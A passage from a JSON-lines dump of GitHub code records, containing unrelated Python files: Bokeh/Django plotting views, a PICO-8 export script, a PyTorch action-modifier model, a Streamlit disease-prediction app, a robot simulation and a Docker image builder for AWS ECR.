I didn't understand that\")\n\n #Checking if user wants to continue\n if user_choice == 'Y':\n print('Here we go again!')\n elif user_choice == 'N':\n break\n","repo_name":"JonathanG94/small_py_projects","sub_path":"1_bagels.py","file_name":"1_bagels.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23223876973","text":"from django.shortcuts import render, render_to_response\n\nfrom bokeh.plotting import figure, output_file, show \nfrom bokeh.embed import components\n\ndef index(request):\n x= [1,3,5,7,9,11,13]\n y= [1,2,3,4,5,6,7]\n title = 'y = f(x)'\n\n plot = figure(title= title , \n x_axis_label= 'X-Axis', \n y_axis_label= 'Y-Axis', \n plot_width =400,\n plot_height =400)\n\n plot.line(x, y, legend= 'f(x)', line_width = 2)\n #Store components \n script, div = components(plot)\n print(\"Scripts--------------\")\n print(script)\n print(\"div--------------\")\n \n print(div)\n\n #Feed them to the Django template.\n return render_to_response('index.html',\n {'script' : script , 'div' : div} )\n\ndef square_plot(request):\n x=range(10)\n y=[a**0.5 for a in x]\n fig=figure(title=\"Y=X^0.5\", x_axis_label=\"X-Axis\", y_axis_label=\"Y-Axis\")\n fig.line(x, y, legend='f(x)', line_width=2)\n script, div = components(fig)\n #Feed them to the Django template.\n return render_to_response('index.html',\n {'script' : script , 'div' : div} )\n\ndef linked_histogram(request):\n import numpy as np\n from bokeh.layouts import row, column\n from bokeh.models import BoxSelectTool, LassoSelectTool, Spacer\n from bokeh.plotting import curdoc\n\n x1 = np.random.normal(loc=5.0, size=400) * 100\n y1 = np.random.normal(loc=10.0, size=400) * 10\n\n x2 = np.random.normal(loc=5.0, size=800) * 50\n y2 = np.random.normal(loc=5.0, size=800) * 10\n\n x3 = np.random.normal(loc=55.0, size=200) * 10\n y3 = np.random.normal(loc=4.0, size=200) * 10\n\n x = np.concatenate((x1, x2, x3))\n y = np.concatenate((y1, y2, y3))\n\n TOOLS=\"pan,wheel_zoom,box_select,lasso_select,reset\"\n\n # create the scatter plot\n p = figure(tools=TOOLS, plot_width=600, plot_height=600, min_border=10, min_border_left=50,\n toolbar_location=\"above\", x_axis_location=None, y_axis_location=None,\n title=\"Linked Histograms\")\n p.background_fill_color = \"#fafafa\"\n p.select(BoxSelectTool).select_every_mousemove = False\n p.select(LassoSelectTool).select_every_mousemove = False\n\n r = p.scatter(x, y, size=3, color=\"#3A5785\", alpha=0.6)\n\n # create the horizontal histogram\n hhist, hedges = np.histogram(x, bins=20)\n hzeros = np.zeros(len(hedges)-1)\n hmax = max(hhist)*1.1\n\n LINE_ARGS = dict(color=\"#3A5785\", line_color=None)\n\n ph = figure(toolbar_location=None, plot_width=p.plot_width, plot_height=200, x_range=p.x_range,\n y_range=(-hmax, hmax), min_border=10, min_border_left=50, y_axis_location=\"right\")\n ph.xgrid.grid_line_color = None\n ph.yaxis.major_label_orientation = np.pi/4\n ph.background_fill_color = \"#fafafa\"\n\n ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hhist, color=\"white\", line_color=\"#3A5785\")\n hh1 = ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hzeros, alpha=0.5, **LINE_ARGS)\n hh2 = ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hzeros, alpha=0.1, **LINE_ARGS)\n\n # create the vertical histogram\n vhist, vedges = np.histogram(y, bins=20)\n vzeros = np.zeros(len(vedges)-1)\n vmax = max(vhist)*1.1\n\n pv = figure(toolbar_location=None, plot_width=200, 
plot_height=p.plot_height, x_range=(-vmax, vmax),\n y_range=p.y_range, min_border=10, y_axis_location=\"right\")\n pv.ygrid.grid_line_color = None\n pv.xaxis.major_label_orientation = np.pi/4\n pv.background_fill_color = \"#fafafa\"\n\n pv.quad(left=0, bottom=vedges[:-1], top=vedges[1:], right=vhist, color=\"white\", line_color=\"#3A5785\")\n vh1 = pv.quad(left=0, bottom=vedges[:-1], top=vedges[1:], right=vzeros, alpha=0.5, **LINE_ARGS)\n vh2 = pv.quad(left=0, bottom=vedges[:-1], top=vedges[1:], right=vzeros, alpha=0.1, **LINE_ARGS)\n\n layout = column(row(p, pv), row(ph, Spacer(width=200, height=200)))\n\n curdoc().add_root(layout)\n curdoc().title = \"Selection Histogram\"\n\n def update(attr, old, new):\n inds = np.array(new['1d']['indices'])\n if len(inds) == 0 or len(inds) == len(x):\n hhist1, hhist2 = hzeros, hzeros\n vhist1, vhist2 = vzeros, vzeros\n else:\n neg_inds = np.ones_like(x, dtype=np.bool)\n neg_inds[inds] = False\n hhist1, _ = np.histogram(x[inds], bins=hedges)\n vhist1, _ = np.histogram(y[inds], bins=vedges)\n hhist2, _ = np.histogram(x[neg_inds], bins=hedges)\n vhist2, _ = np.histogram(y[neg_inds], bins=vedges)\n\n hh1.data_source.data[\"top\"] = hhist1\n hh2.data_source.data[\"top\"] = -hhist2\n vh1.data_source.data[\"right\"] = vhist1\n vh2.data_source.data[\"right\"] = -vhist2\n\n r.data_source.on_change('selected', update)\n script, div = components(layout)\n return render_to_response('index.html',\n {'script' : script , 'div' : div} )\n","repo_name":"yogendratamang48/BokehDjango","sub_path":"BokehWeb/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4881,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"22457458213","text":"import os\nfrom subprocess import Popen, PIPE\nimport re\nimport tempfile\n\nlocal_dir = os.path.dirname(os.path.realpath(__file__))\nblender_dir = os.path.expandvars(\"%programfiles%/Blender Foundation/Blender\")\n\ndef call(args):\n proc = Popen(args, stdout=PIPE, stderr=PIPE)\n out, err = proc.communicate()\n exitcode = proc.returncode\n #\n return exitcode, out, err\n\nfile_list = ['vtree','ground','plane','cornell','torus','cube']\ns = \"{:02x}\".format(len(file_list))\nfor blend_file in file_list:\n print(\"Exporting: {}.blend\".format(blend_file))\n fd, path = tempfile.mkstemp()\n try:\n os.close(fd)\n exitcode, out, err = call([os.path.join(blender_dir,\"blender.exe\"),os.path.join(local_dir,blend_file + \".blend\"),\"--background\",\"--python\",os.path.join(local_dir,\"blender_export_fill.py\"),\"--\",\"--out\",path])\n if err:\n raise Exception('Unable to load: {}. 
Exception: {}'.format(blend_file,err))\n #print(\"exit: {} \\n out:{}\\n err: {}\\n\".format(exitcode,out,err))\n with open(path, 'r') as outfile:\n s = s + outfile.read()\n finally:\n os.remove(path)\n\n# pico-8 map format\n# first 4096 bytes -> gfx (shared w/ map)\n# second 4096 bytes -> map\nif len(s)>=2*8192:\n raise Exception('Data string too long ({})'.format(len(s)))\n\ntmp=s[:8192]\nprint(\"__gfx__\")\n# swap bytes\ngfx_data = \"\"\nfor i in range(0,len(tmp),2):\n gfx_data = gfx_data + tmp[i+1:i+2] + tmp[i:i+1]\nprint(re.sub(\"(.{128})\", \"\\\\1\\n\", gfx_data, 0, re.DOTALL))\n\nmap_data=s[8192:]\nif len(map_data)>0:\n print(\"__map__\")\n print(re.sub(\"(.{256})\", \"\\\\1\\n\", map_data, 0, re.DOTALL))\n\n","repo_name":"freds72/pico8","sub_path":"models/run_export.py","file_name":"run_export.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"53"} +{"seq_id":"40998070697","text":"import pandas as pd\n\nfrom src.data_preprocessor.missing_handlers.base_missing_handler import BaseMissingHandler\n\n\nclass SolarGenerationMissingHandler(BaseMissingHandler):\n def handle(self, data: pd.DataFrame, solar_generation_column_name: str = 'generation_solar_actual') -> pd.DataFrame:\n missing_solar_data = data[data[solar_generation_column_name].isnull()]\n complete_data = data[~data[solar_generation_column_name].isnull()]\n if not missing_solar_data.empty:\n actual_solar_generation = self._read_actual_solar_generation()\n solar_data = pd.merge(missing_solar_data, actual_solar_generation, left_index=True, right_index=True)\n solar_data[solar_generation_column_name] = solar_data['system_generation'].round(3)\n solar_data.drop(columns=['system_generation'], inplace=True)\n complete_data = pd.concat([complete_data, solar_data])\n complete_data.sort_index(inplace=True)\n return complete_data\n\n def _read_actual_solar_generation(self):\n solar_generation_profile = pd.read_pickle('resources/pv_profile.pkl')\n solar_generation = solar_generation_profile[['date', 'system_generation']]\n solar_generation.set_index('date', inplace=True)\n return solar_generation\n\n\nif __name__ == '__main__':\n from src.data_generator.basic_pipeline import BasicPipeline\n from datetime import datetime\n\n start_day = datetime(2020, 4, 1)\n end_day = datetime(2020, 4, 30)\n pipeline = BasicPipeline(start_day, end_day)\n df = pipeline.fit_transform()\n\n handled = SolarGenerationMissingHandler().handle(data=df)\n","repo_name":"BlooAM/Day-ahead-prices","sub_path":"src/data_preprocessor/missing_handlers/solar_generation.py","file_name":"solar_generation.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18280856650","text":"import math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\ndef load_word_embeddings(emb_file, vocab):\n vocab = [word.lower() for word in vocab]\n\n embeddings = {}\n with open(emb_file, 'r') as f:\n for line in f:\n line = line.strip().split(' ')\n word_vec = torch.FloatTensor(list(map(float, line[1:])))\n embeddings[line[0]] = word_vec\n embeddings = [embeddings[word] for word in vocab]\n embeddings = torch.stack(embeddings)\n print('loaded word embeddings')\n return embeddings\n\nclass MLP(nn.Module):\n def __init__(self, inp_dim, out_dim, num_layers=1, relu=True, bias=True):\n super(MLP, self).__init__()\n network = []\n for i in range(num_layers-1):\n 
network.append(nn.Linear(inp_dim, inp_dim, bias=bias))\n network.append(nn.ReLU(True))\n network.append(nn.Linear(inp_dim, out_dim, bias=bias))\n if relu:\n network.append(nn.ReLU(True))\n\n self.network = nn.Sequential(*network)\n\n def forward(self, x):\n output = self.network(x)\n return output\n\nclass SDPAttention(nn.Module):\n def __init__(self, d_model, d_k, d_v, emb_dim, heads=1, dropout=0.1):\n super(SDPAttention, self).__init__()\n self.d_k = int(d_k/heads)\n self.d_v = int(d_v/heads)\n d_model = int(d_model/heads)\n self.q_linear = nn.Linear(int(emb_dim/heads), self.d_k)\n self.k_linear = nn.Linear(d_model, self.d_k)\n self.v_linear = nn.Linear(d_model, self.d_v)\n self.h = heads\n\n self.dropout = nn.Dropout(dropout)\n\n self.out = nn.Linear(heads*self.d_v, emb_dim)\n\n def attention(self, q, k, v, dropout=None):\n scores = torch.matmul(q, k.transpose(-2, -1)) / math.sqrt(self.d_k)\n scores = F.softmax(scores, dim=-1)\n if dropout is not None:\n scores = dropout(scores)\n output = torch.matmul(scores, v)\n output = output.reshape(output.shape[0], output.shape[1], output.shape[-1])\n return output, scores\n\n def forward(self, features, queries):\n bs = queries.shape[0]\n q = self.q_linear(queries.view(bs, -1, self.h, int(queries.shape[-1]/self.h)))\n k = self.k_linear(features.view(bs, -1, self.h, int(features.shape[-1]/self.h)))\n v = self.v_linear(features.view(bs, -1, self.h, int(features.shape[-1]/self.h)))\n q = q.transpose(1,2)\n k = k.transpose(1,2)\n v = v.transpose(1,2)\n\n output, scores = self.attention(q, k, v, self.dropout)\n concat = output.transpose(1,2).contiguous().view(bs, self.d_v*self.h)\n output = self.out(concat)\n return output, scores\n\nclass ActionModifiers(nn.Module):\n def __init__(self, dset, args):\n super(ActionModifiers, self).__init__()\n if args.temporal_agg == 'sdp':\n self.video_embedder = SDPAttention(dset.feature_dim, args.emb_dim, args.emb_dim, args.emb_dim,\n heads=4)\n else:\n self.video_embedder = MLP(dset.feature_dim, args.emb_dim)\n\n self.action_modifiers = nn.ParameterList([nn.Parameter(torch.eye(args.emb_dim))\n for _ in range(len(dset.adverbs))])\n self.action_embedder = nn.Embedding(len(dset.actions), args.emb_dim)\n\n if args.glove_init:\n pretrained_weight = load_word_embeddings('data/glove.6B.300d.txt', dset.actions)\n self.action_embedder.weight.data.copy_(pretrained_weight)\n\n for param in self.action_embedder.parameters():\n param.requires_grad = False\n\n self.margin = 0.5\n self.transformer = False\n if args.temporal_agg == 'sdp':\n self.transformer = True\n\n self.compare_metric = lambda vid_feats, act_adv_embed: -F.pairwise_distance(vid_feats, act_adv_embed)\n self.dset = dset\n\n ## precompute validation pairs\n adverbs, actions = zip(*self.dset.pairs)\n self.val_adverbs = torch.LongTensor([dset.adverb2idx[adv.strip()] for adv in adverbs]).cuda()\n self.val_actions = torch.LongTensor([dset.action2idx[act.strip()] for act in actions]).cuda()\n\n def apply_modifiers(self, modifiers, embedding):\n output = torch.bmm(modifiers, embedding.unsqueeze(2)).squeeze(2)\n output = F.relu(output)\n return output\n\n def train_forward(self, x):\n features, adverbs, actions = x[0], x[1], x[2]\n neg_adverbs, neg_actions = x[3], x[4]\n action_embedding = self.action_embedder(actions)\n neg_action_embedding = self.action_embedder(neg_actions)\n if self.transformer:\n video_embedding, attention_weights = self.video_embedder(features, action_embedding)\n else:\n video_embedding = self.video_embedder(features)\n attention_weights = 
None\n\n pos_modifiers = torch.stack([self.action_modifiers[adv.item()] for adv in adverbs])\n positive = self.apply_modifiers(pos_modifiers, action_embedding)\n negative_act = self.apply_modifiers(pos_modifiers, neg_action_embedding)\n\n neg_modifiers = torch.stack([self.action_modifiers[adv.item()] for adv in neg_adverbs])\n negative_adv = self.apply_modifiers(neg_modifiers, action_embedding)\n\n loss_triplet_act = F.triplet_margin_loss(video_embedding, positive, negative_act, margin=self.margin)\n loss_triplet_adv = F.triplet_margin_loss(video_embedding, positive, negative_adv, margin=self.margin)\n loss = [loss_triplet_act, loss_triplet_adv]\n\n return loss, None, attention_weights, video_embedding\n\n def val_forward(self, x):\n features = x[0]\n actions = x[2]\n batch_size = features.shape[0]\n\n if self.transformer:\n action_gt_embedding = self.action_embedder(actions)\n video_embedding, attention_weights = self.video_embedder(features, action_gt_embedding)\n else:\n video_embedding = self.video_embedder(features)\n attention_weights = None\n action_embedding = self.action_embedder(self.val_actions)\n modifiers = torch.stack([self.action_modifiers[adv.item()] for adv in self.val_adverbs])\n action_adverb_embeddings = self.apply_modifiers(modifiers, action_embedding)\n\n scores = {}\n for i, (adverb, action) in enumerate(self.dset.pairs):\n pair_embedding = action_adverb_embeddings[i, None].expand(batch_size, action_adverb_embeddings.size(1))\n score = self.compare_metric(video_embedding, pair_embedding)\n scores[(adverb, action)] = score\n return None, scores, attention_weights, video_embedding\n\n def forward(self, x):\n if self.training:\n loss, pred, att, vid_feats = self.train_forward(x)\n else:\n with torch.no_grad():\n loss, pred, att, vid_feats = self.val_forward(x)\n return loss, pred, att, vid_feats\n\nclass Evaluator:\n def __init__(self, dset, model):\n self.dset = dset\n pairs = [(dset.adverb2idx[adv.strip()], dset.action2idx[act]) for adv, act in dset.pairs]\n self.pairs = torch.LongTensor(pairs)\n\n ## mask over pairs for ground-truth action given in testing\n action_gt_mask = []\n for _act in dset.actions:\n mask = [1 if _act==act else 0 for adv, act in dset.pairs]\n action_gt_mask.append(torch.BoolTensor(mask))\n self.action_gt_mask = torch.stack(action_gt_mask, 0)\n\n antonym_mask = []\n for _adv in dset.adverbs:\n mask = [1 if (_adv==adv or _adv==dset.antonyms[adv]) else 0 for adv, act in dset.pairs]\n antonym_mask.append(torch.BoolTensor(mask))\n self.antonym_mask = torch.stack(antonym_mask, 0)\n\n def get_gt_action_scores(self, scores, action_gt):\n mask = self.action_gt_mask[action_gt]\n action_gt_scores = scores.clone()\n action_gt_scores[~mask] = -1e10\n return action_gt_scores\n\n def get_antonym_scores(self, scores, adverb_gt):\n mask = self.antonym_mask[adverb_gt]\n antonym_scores = scores.clone()\n antonym_scores[~mask] = -1e10\n return antonym_scores\n\n def get_gt_action_antonym_scores(self, scores, action_gt, adverb_gt):\n mask = self.antonym_mask[adverb_gt] & self.action_gt_mask[action_gt]\n action_gt_antonym_scores = scores.clone()\n action_gt_antonym_scores[~mask] = -1e10\n return action_gt_antonym_scores\n\n def get_scores(self, scores, action_gt, adverb_gt):\n scores = {k:v.cpu() for k, v in scores.items()}\n action_gt = action_gt.cpu()\n\n scores = torch.stack([scores[(adv, act)] for adv, act in self.dset.pairs], 1)\n action_gt_scores = self.get_gt_action_scores(scores, action_gt)\n antonym_action_gt_scores = 
self.get_gt_action_antonym_scores(scores, action_gt, adverb_gt)\n return scores, action_gt_scores, antonym_action_gt_scores\n\n \n","repo_name":"hazeld/action-modifiers","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8949,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"19748700879","text":"from threading import Lock\nfrom typing import Optional\nimport warnings\n\nwarnings.warn(\n \"the globals_manager module is deprecated\", DeprecationWarning, stacklevel=2\n)\n\n__GLOBALS_DICT = dict()\n__LOCK_TIMEOUT = 50\n__GLOBALS_LOCK = Lock()\n\n\ndef get_global(global_param_id: int, lock: bool = False):\n global __LOCK_TIMEOUT, __GLOBALS_DICT\n if lock:\n __GLOBALS_LOCK.acquire(timeout=__LOCK_TIMEOUT)\n global_param = __GLOBALS_DICT.get(global_param_id)\n if lock:\n __GLOBALS_LOCK.release()\n return global_param\n\n\ndef update_global(global_param_id: int, parameter: any, lock: bool = False):\n global __LOCK_TIMEOUT, __GLOBALS_DICT\n if lock:\n __GLOBALS_LOCK.acquire(timeout=__LOCK_TIMEOUT)\n __GLOBALS_DICT[global_param_id] = parameter\n if lock:\n __GLOBALS_LOCK.release()\n\n\ndef lock_global_pool(\n blocking: Optional[bool] = None, timeout: Optional[float] = None\n) -> bool:\n \"\"\"Lock the global objects. This is important if the values are changed. Don't forget to unlock\n the pool after finishing work with the globals!\n :param timeout_seconds: Attempt to lock for this many second. Default value -1 blocks\n permanently until lock is released.\n :return: Returns whether lock was locked or not.\n \"\"\"\n global __LOCK_TIMEOUT, __GLOBALS_LOCK\n if blocking is None:\n blocking = True\n if timeout is None:\n timeout = __LOCK_TIMEOUT\n return __GLOBALS_LOCK.acquire(blocking=blocking, timeout=timeout)\n\n\ndef unlock_global_pool():\n global __GLOBALS_LOCK\n \"\"\"Releases the lock so other objects can use the global pool as well\"\"\"\n return __GLOBALS_LOCK.release()\n\n\ndef set_lock_timeout(timeout: float):\n global __LOCK_TIMEOUT\n \"\"\"Set the timeout for the globals manager lock which can ensure thread-safety\"\"\"\n __LOCK_TIMEOUT = timeout\n","repo_name":"robamu-org/tmtccmd","sub_path":"tmtccmd/core/globals_manager.py","file_name":"globals_manager.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"73030015529","text":"import sys\nfrom itertools import combinations\ninput = sys.stdin.readline\n\nwhile True:\n tmp = list(map(int, input().split()))\n k = tmp.pop(0)\n\n if k == 0:\n break\n\n combi = combinations(tmp, 6)\n\n for i in combi:\n for j in i:\n print(j, end=' ')\n print()\n\n print()","repo_name":"CHOSIYEON/Algorithms","sub_path":"BAEKJOON/Brute Force/6603.py","file_name":"6603.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71275429927","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 24 19:58:20 2023\r\n\r\n@author: Ishita\r\n\"\"\"\r\n\r\nimport pickle\r\nimport streamlit as st\r\n\r\nfrom streamlit_option_menu import option_menu\r\n\r\n#loading models\r\ndiabetesmodel=pickle.load(open(\"C:/Users/Dell/Desktop/Multiple Prediction system/diabetes.sav\",'rb'))\r\n\r\nheartdiseasemodel=pickle.load(open(\"C:/Users/Dell/Desktop/Multiple Prediction system/heartmodel.sav\",'rb'))\r\n\r\nbreastcancermodel=pickle.load(open(\"C:/Users/Dell/Desktop/Multiple Prediction 
system/breast.sav\",'rb'))\r\n\r\n\r\n#sidebar customization for navigation purpose\r\n\r\nwith st.sidebar:\r\n selected=option_menu('MULTIPLE DISEASE PREDICTION TECHNIQUE',\r\n ['DIABETES PREDICTION','HEART DISEASE PREDICTION', 'TYPE OF BREAST CANCER PREDICTION'\r\n ],\r\n icons=['activity','heart','person'],\r\n default_index=0)\r\n\r\n# Diabetes Prediction Page\r\nif (selected==\"DIABETES PREDICTION\"):\r\n \r\n # page title\r\n st.title('Diabetes Prediction using SVM')\r\n col1, col2, col3 = st.columns(3)\r\n with col1:\r\n Pregnancies = st.text_input('Number of Pregnancies')\r\n with col2:\r\n Glucose = st.text_input('Glucose Level')\r\n with col3:\r\n BloodPressure = st.text_input('Blood Pressure value')\r\n with col1:\r\n SkinThickness = st.text_input('Skin Thickness value')\r\n with col2:\r\n Insulin = st.text_input('Insulin Level')\r\n with col3:\r\n BMI = st.text_input('BMI value')\r\n with col1:\r\n DiabetesPedigreeFunction = st.text_input('Diabetes Pedigree Function value')\r\n with col2:\r\n Age = st.text_input('Age of the Person')\r\n \r\n \r\n # code for Prediction\r\n diab_diagnosis = ''\r\n \r\n # creating a button for Prediction\r\n \r\n if st.button('Diabetes Test Result'):\r\n diab_prediction = diabetesmodel.predict([[Pregnancies, Glucose, BloodPressure, SkinThickness, Insulin, BMI, DiabetesPedigreeFunction, Age]])\r\n \r\n if (diab_prediction[0] == 1):\r\n diab_diagnosis = 'The person is diabetic'\r\n else:\r\n diab_diagnosis = 'The person is not diabetic'\r\n \r\n st.success(diab_diagnosis)\r\n\r\n\r\n\r\n\r\n# Heart Disease Prediction Page\r\nif (selected == 'HEART DISEASE PREDICTION'):\r\n \r\n # page title\r\n st.title('Heart Disease Prediction using Logistic Regression')\r\n \r\n col1, col2, col3 = st.columns(3)\r\n \r\n with col1:\r\n age = st.text_input('Age')\r\n \r\n with col2:\r\n sex = st.text_input('Sex')\r\n \r\n with col3:\r\n cp = st.text_input('Chest Pain types')\r\n \r\n with col1:\r\n trestbps = st.text_input('Resting Blood Pressure')\r\n \r\n with col2:\r\n chol = st.text_input('Serum Cholestoral in mg/dl')\r\n \r\n with col3:\r\n fbs = st.text_input('Fasting Blood Sugar > 120 mg/dl')\r\n \r\n with col1:\r\n restecg = st.text_input('Resting Electrocardiographic results')\r\n \r\n with col2:\r\n thalach = st.text_input('Maximum Heart Rate achieved')\r\n \r\n with col3:\r\n exang = st.text_input('Exercise Induced Angina')\r\n \r\n with col1:\r\n oldpeak = st.text_input('ST depression induced by exercise')\r\n \r\n with col2:\r\n slope = st.text_input('Slope of the peak exercise ST segment')\r\n \r\n with col3:\r\n ca = st.text_input('Major vessels colored by flourosopy')\r\n \r\n with col1:\r\n thal = st.text_input('thal: 0 = normal; 1 = fixed defect; 2 = reversable defect')\r\n \r\n \r\n \r\n \r\n # code for Prediction\r\n heart_diagnosis = ''\r\n \r\n # creating a button for Prediction\r\n \r\n if st.button('Heart Disease Test Result'):\r\n heart_prediction = heartdiseasemodel.predict([[age, sex, cp, trestbps, chol, fbs, restecg,thalach,exang,oldpeak,slope,ca,thal]]) \r\n \r\n if (heart_prediction[0] == 1):\r\n heart_diagnosis = 'The person is having heart disease'\r\n else:\r\n heart_diagnosis = 'The person does not have any heart disease'\r\n \r\n st.success(heart_diagnosis)\r\n \r\nif (selected=='TYPE OF BREAST CANCER PREDICTION'):\r\n #title setting\r\n st.title(\"Type OF Breast Cancer Prediction using Random Forest\")\r\n col1, col2, col3 = st.columns(3)\r\n with col1:\r\n radius_mean=st.text_input(\"Enter Radius Mean\")\r\n with col2:\r\n 
texture_mean=st.text_input(\"Enter Texture Mean\")\r\n with col3:\r\n perimeter_mean=st.text_input(\"Enter Perimeter Mean\")\r\n with col1:\r\n area_mean=st.text_input(\"Enter Area Mean\")\r\n with col2:\r\n smoothness_mean=st.text_input(\"Enter Smoothness Mean\")\r\n with col3:\r\n concavity_mean=st.text_input(\"Enter Concavity Mean\")\r\n with col1:\r\n concavepoints_mean=st.text_input(\"Enter Concave Points Mean\")\r\n with col2:\r\n symmetry_mean=st.text_input(\"Enter Symmetry Mean\")\r\n with col3:\r\n fractal_dimension_mean=st.text_input(\"Enter Fractal dimension Mean\")\r\n \r\n # code for Prediction\r\n breast_diagnosis = '' \r\n # creating a button for Prediction\r\n \r\n if st.button('Breast Cancer Type Test Result'):\r\n cancer_prediction = breastcancermodel.predict([[radius_mean,texture_mean,perimeter_mean,area_mean,smoothness_mean,concavity_mean,concavepoints_mean,symmetry_mean,fractal_dimension_mean]]) \r\n \r\n \r\n if (cancer_prediction[0] == 1):\r\n breast_diagnosis = \"The Pateint is suffering from Malignant Tumor(which can spread throughout the whole body via blood)\"\r\n else:\r\n breast_diagnosis = \"The Patient is suffering from Benign Tumor (which spreads locally)\"\r\n \r\n st.success(breast_diagnosis)\r\n ","repo_name":"ishitabahuguna/Multiple-Disease-Prediction-system","sub_path":"MULTIPLE DISEASE PREDICTION SYSTEM.py","file_name":"MULTIPLE DISEASE PREDICTION SYSTEM.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70276356648","text":"\"\"\"Robot motion simulation with simple text-based graphics\"\"\"\n# MCS 275 Spring 2021 - David Dumas\n# Used in Lecture 5 and Lecture 6\n\nfrom plane import Vector,Point\nimport bots\nimport random\nimport time\n\nwidth=60\nheight=30\n\ncurrent_bots = []\n\n# Make some wander bots\nfor i in range(5):\n P = Point(random.randint(0,width-1),random.randint(0,height-1))\n current_bots.append(bots.WanderBot(position=P))\n\n# Make some patrol bots\npatrol_directions = [ \n Vector(1,0),\n Vector(0,1),\n Vector(1,1)\n]\nfor i in range(10):\n P = Point(random.randint(0,width-1),random.randint(0,height-1))\n D = random.choice(patrol_directions)\n current_bots.append(bots.PatrolBot(position=P,direction=D,nstep=8))\n\n# Make two destruct bots\ncurrent_bots.append(bots.DestructBot(position=Point(4,4),lifetime=5))\ncurrent_bots.append(bots.DestructBot(position=Point(4,10),lifetime=15))\n\n# Symbols for the different kinds of bots\nbotsymbols = {\n bots.PatrolBot: \"P\",\n bots.DestructBot: \"D\",\n bots.WanderBot: \"W\",\n bots.Bot: \"*\"\n}\n\nprint(\"Press ENTER to begin the simulation\")\ninput()\n\nn=0\nwhile True:\n print(\"\\n\"*2*height)\n board = [ [\" \"]*width for _ in range(height) ]\n for b in current_bots:\n if not b.alive:\n continue\n elif b.position.x < 0 or b.position.x >= width:\n continue\n elif b.position.y < 0 or b.position.y >= height:\n continue\n # Mark the spot with a symbol depending on bot type\n board[b.position.y][b.position.x] = botsymbols[b.__class__]\n \n # To print the board, we'll print a lot of newlines, then\n # the board itself, and then the time indicator. We'll put those\n # into a single string to reduce the chance that part of the display\n # is updated before the whole thing is shown. 
This makes the\n # \"graphics\" a little more fluid.\n boardstr = \"\\n\"*3*height\n for row in board:\n boardstr+=\"\".join(row) + \"\\n\"\n boardstr += \"time={}\".format(n)\n print(boardstr,flush=True)\n time.sleep(0.2)\n\n for b in current_bots:\n b.update()\n n += 1\n","repo_name":"daviddumas/mcs275spring2021","sub_path":"samplecode/botsimulation.py","file_name":"botsimulation.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74204523367","text":"import base64\nimport logging\nimport os\n\nimport boto3\nimport botocore\nimport docker\nimport yaml\n\nfrom stactools_pipelines.models.pipeline import Pipeline\n\nlogging.basicConfig(level=logging.DEBUG)\npipeline_name = os.environ[\"PIPELINE\"]\n\n\ndef build_and_push(dockerfile: str, tag: str, pipeline_id: str):\n image, build_logs = client.images.build(\n path=\"./\",\n dockerfile=dockerfile,\n tag=tag,\n buildargs={\n \"pipeline\": pipeline_id,\n },\n )\n for chunk in build_logs:\n if \"stream\" in chunk:\n for line in chunk[\"stream\"].splitlines():\n logging.debug(line)\n\n ecr_client = boto3.client(\"ecr\")\n try:\n ecr_client.create_repository(repositoryName=tag)\n except botocore.exceptions.ClientError as error:\n if error.response[\"Error\"][\"Code\"] == \"RepositoryAlreadyExistsException\":\n logging.debug(\"Repository already exists\")\n else:\n raise error\n\n ecr_credentials = ecr_client.get_authorization_token()[\"authorizationData\"][0]\n\n ecr_password = (\n base64.b64decode(ecr_credentials[\"authorizationToken\"])\n .replace(b\"AWS:\", b\"\")\n .decode(\"utf-8\")\n )\n\n ecr_url = ecr_credentials[\"proxyEndpoint\"]\n client.login(username=\"AWS\", password=ecr_password, registry=ecr_url)\n ecr_repo_name = \"{}/{}\".format(ecr_url.replace(\"https://\", \"\"), tag)\n image.tag(ecr_repo_name, tag=\"latest\")\n push_log = client.images.push(ecr_repo_name, tag=\"latest\")\n logging.debug(push_log)\n\n\nwith open(f\"./stactools_pipelines/pipelines/{pipeline_name}/config.yaml\") as f:\n config = yaml.safe_load(f)\n pipeline = Pipeline(**config)\n\n client = docker.from_env()\n if pipeline.compute == \"awslambda\":\n dockerfile = \"./lambda.collection.Dockerfile\"\n tag = f\"{pipeline.id}-collection\"\n build_and_push(dockerfile, tag, pipeline.id)\n\n dockerfile = \"./lambda.Dockerfile\"\n tag = pipeline.id\n build_and_push(dockerfile, tag, pipeline.id)\n\n if pipeline.inventory_location:\n dockerfile = \"./lambda.historic.Dockerfile\"\n tag = f\"{pipeline.id}-historic\"\n build_and_push(dockerfile, tag, pipeline.id)\n","repo_name":"developmentseed/stactools-pipelines","sub_path":"image_builder.py","file_name":"image_builder.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"44030190280","text":"import os\nimport argparse\nfrom tensorflow_asr.utils.env_util import setup_environment, setup_strategy\n\nlogger = setup_environment()\nimport tensorflow as tf\n\nDEFAULT_YAML = os.path.join(os.path.abspath(os.path.dirname(__file__)), 